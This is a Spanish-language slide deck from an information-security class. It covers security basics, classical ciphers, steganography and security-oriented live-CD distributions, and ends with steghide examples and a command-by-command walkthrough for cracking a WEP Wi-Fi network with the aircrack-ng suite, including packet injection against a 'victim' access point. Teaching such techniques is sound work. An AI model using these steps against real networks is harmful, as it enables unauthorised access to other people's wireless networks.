1. SEGURIDAD INFORMÁTICA
Distribuciones Live-CD
Prof. Manuel Mujica
manuel@ubuntu.org.ve
2. CONTENIDO
¿Qué es seguridad de la información?
¿Por qué seguridad informática?
Modelos de ataques
Criptografía
Esteganografía
Distribuciones Live-CD
Ejemplos
3. ¿Qué es Seguridad de la Información?
Seguridad de información es mucho más que establecer
“firewalls”, aplicar parches para corregir nuevas vulnerabilidades
en el sistema de software, o guardar en la bóveda los “backups”.
Seguridad de información es determinar qué requiere ser protegido
y por qué, de qué debe ser protegido y cómo protegerlo.
4. ¿Qué es Seguridad de la Información?
La seguridad de información se caracteriza por la preservación de:
CONFIDENCIALIDAD : La información está protegida de
personas no autorizadas.
INTEGRIDAD : La información está como se pretende, sin
modificaciones inapropiadas.
DISPONIBILIDAD : Los usuarios tienen acceso a la información
y a los activos asociados cuando lo requieran.
5. ¿Por qué seguridad informática?
RSA, la División de Seguridad de EMC (NYSE: EMC), anunció
los resultados de la Encuesta mundial sobre seguridad del
consumidor en línea del año 2010: 92% realizó una transacción
bancaria en línea y el 80% realizó una compra en línea.
Un reciente estudio de Federal Deposit Insurance Corporation
(FDIC) indica que durante el último trimestre de 2009, los
ciberdelincuentes robaron más de 150 millones de dólares de
cuentas bancarias de pequeñas y medianas empresas
norteamericanas.
6. Modelos de Ataques
E R E R
I I
Intercepción Modificación
E R E R
E: Emisor
I I R: Receptor
I: Intruso
Fabricación Interrupción
7. Criptografía
Técnica para ocultar y así proteger información
Técnica para ocultar y así proteger información
mientras permanece en disco
mientras permanece en disco
o mientras está en tránsito
o mientras está en tránsito
Substitución:
Cambia un carácter por uno o varios caracteres
M U R C I E L A GO
0 1 2 3 4 5 6 7 8 9
Hola como estas H967 3909 5ST7S
8. Criptografía
Substitución.
Sustituir un elemento del alfabeto del texto-plano por uno que corres-
ponde al alfabeto del texto-cifrado.
El alfabeto latino, que consta de 29 letras: A, B, C, Ch, D, E, F, G, H, I,
J, K, L, Ll, M, N, Ñ, O, P, Q, R, S, T, U, V, W, X, Y y Z
Texto-plano: UNIVERSIDAD
Texto-cifrado: XPLYHUVLGChG
9. Criptografía
Transposición (Permutación).
Permuta los caracteres del texto plano.
Texto-plano: ESTE ES UN MENSAJE DE PRUEBA!
Texto-cifrado: EUAR SNJU TMEE EEDB ENEA SSP!
E S T E E S
U NM E N S
A J E D E P
R U E B A !
10. Esteganografía
El término "esteganografía" viene del griego stegos, que signi-
fica "cubierta", por lo que esteganografía significaría "escritu-
ra oculta" o "escritura encubierta".
Así pues, la esteganografía es el conjunto de técnicas que per-
miten ocultar o camuflar la información.
Nótese que la criptografía modifica los datos para que no sean
legibles, a diferencia de la esteganografía, que simplemente los
toma y los oculta entre otros datos.
La esteganografía se utiliza para crear canales encubiertos
(covert channels) y marcas de agua (watermarks) para proteger
derechos de autor.
13. nUbuntu
nUbuntu o Network Ubuntu es un proyecto para tomar la
distribución Ubuntu existente y reconvertirla en un LiveCD e
instalación completa con las herramientas necesarias para realizar
pruebas de penetración en servidores y redes.
La distro incluye algunos de los programas de seguridad para
Linux más usados, tales como Ethereal, nmap, dSniff, y
Ettercap.
Distribución GNU/Linux Fuente: http://www.nubuntu.org
14. CAINE
CAINE (Computer Aided INvestigative Environment) es una
distribución GNU/Linux de origen italiano. Creado como un
proyecto de Ingeniería Forense.
Proporciona:
Fácil interoperabilidad durante todo el análisis (Preservación,
Recolección, Análisis, Reportes).
Amigable entorno gráfico.
Ubuntu como sistema base.
Generación semi-automática de reportes.
15. CAINE
Algunas herramientas incluidas:
Grissom Analyzer
Automated Image & Restore (AIR)
Guymager
Foremost and Scalpel
Autopsy 2.20 and TSK 3.0
SFDumper
Fundl
Stegdetect
Ophcrack
CAINE es Open Source Fuente: http://www.caine-live.net/
16. BackTrack
BackTrack es una distribución GNU/Linux en formato Live-CD
pensada y diseñada para la auditoría de seguridad y relacionada
con la seguridad informática en general.
Se deriva de la unión de dos grandes distribuciones orientadas a la
seguridad, el Auditor + WHAX.
Sistema base Ubuntu.
17. BackTrack
Incluye una larga lista de herramientas de seguridad listas para
usar, entre las que destacan numerosos scanners de puertos y
vulnerabilidades, archivos de exploits, sniffers, herramientas
de análisis forense y herramientas para la auditoría Wireless.
Fuente: http://www.backtrack-linux.org/
18. BackTrack
Lista de Herramientas:
Recolección de Información (37)
Dig, TCPtraceroute, Tctrace, Whoami.
Mapeo de Redes (28)
Hping, Nmap
Identificación de Vulnerabilidades (65)
GFI LanGuard, Nikto, SuperScan
Penetración (12)
OpenSSL-To-Open, Pirana
Escalada de Privilegios (48)
Etherape, EtterCap, Wireshark
Mantenimiento de Acceso (15)
Backdoors, CryptCat
19. BackTrack
Lista de Herramientas:
Cubrimiento (1)
Housekeeping
Análisis de redes inalámbricas
802.11 WIFI (25): aircrack-ng, Airsnort
Bluetooth (22): Btcrack, hstest
VOIP & Análsis telefónico (7)
SIPdump, Smap
Ingeniería forence (13)
Autopsy, DD_Rescue, Foremost, Rootkithunter
Ingeniería Inversa (7)
GDB GNU Debugger, GDB Console GUI
Servicios (1)
SNORT
20. Ejemplos: steghide
Adjuntar adj.txt en cvr.jpg:
#steghide embed -cf cvr.jpg -ef adj.txt
Extraer datos adjuntos desde cvr.jpg:
#steghide extract -sf cvr.jpg
24. Ejemplos: crack wep wifi
Términos:
-------------
BSSID (mac del router que da la señal)
PWR (Poder de señal)
CHN (Canal que se encuentra la red)
ENCR (Es el tipo de contraseña que tiene la red)
ESSID (Nombre de la red inalámbrica).
25. Ejemplos: crack wep wifi
Caso 1: Red sin Filtro de MAC:
Abrimos una Terminal (consola 1):
1. Ponemos la tarjeta en modo monitor con airmon-ng
airmon-ng start [nombre tarjeta inalámbrica] --> wlan0, wlan1,
ath0,.
Ejemplo:
#airmon-ng start wlan0
En modo monitor, la tarjeta quedara renombrada como: mon0 o
mon1
26. Ejemplos: crack wep wifi
Caso 1: Red sin Filtro de MAC:
2. Escaneamos las redes wireless con airodump-ng
airodump-ng [nombre tarjeta inalámbrica] --> mon0, mon1…..
Ejemplo:
#airodump-ng mon0
Verificamos el canal (CH) en el que está trabajando la red al cual
atacaremos.
Presionamos Ctrl + c para detener el escaneo.
27. Ejemplos: crack wep wifi
Caso 1: Red sin Filtro de MAC:
Abrimos otra Terminal (consola 2):
1. Nos asociamos a la red inalámbrica con aireplay-ng
aireplay-ng -1 0 -a [MAC AP Victima] [nombre tarjeta wifi]
Ejemplo:
#aireplay-ng -1 0 –a 11:22:33:44:55:66 mon0
2. Empezamos a inyectar paquetes a la red asociada con aireplay-
ng
aireplay-ng -3 -b [MAC AP Victima] [nombre tarjeta wifi]
Ejemplo:
#aireplay-ng -3 –b 11:22:33:44:55:66 mon0
28. Ejemplos: crack wep wifi
Caso 1: Red sin Filtro de MAC:
Abrimos otra Terminal (consola 3):
1. Una vez capturado una gran cantidad de datos (Data) vamos a
crackear la red inalámbrica con aircrack-ng
aircrack-ng [filename]-01.cap
Ejemplo:
#aircrack-ng wep-01.cap
29. GRACIAS POR SU ATENCIÓN
"Sólo hay un bien: el
conocimiento.
Sólo hay un mal:
la ignorancia."
Sócrates.
30. http://pide.wordpress.com
CONTACTO:
email: manuel@ubuntu.org.ve
OpenPGP keys:7661B42E
http://pgp.cs.uu.nl/
Twitter: @mmujica001
Ubuntu User #4728
Linux User #439689
Blog's: http://pide.wordpress.com
http://www.ubuntu-ve.org
http://creativecommons.org/licenses/by/3.0/deed.es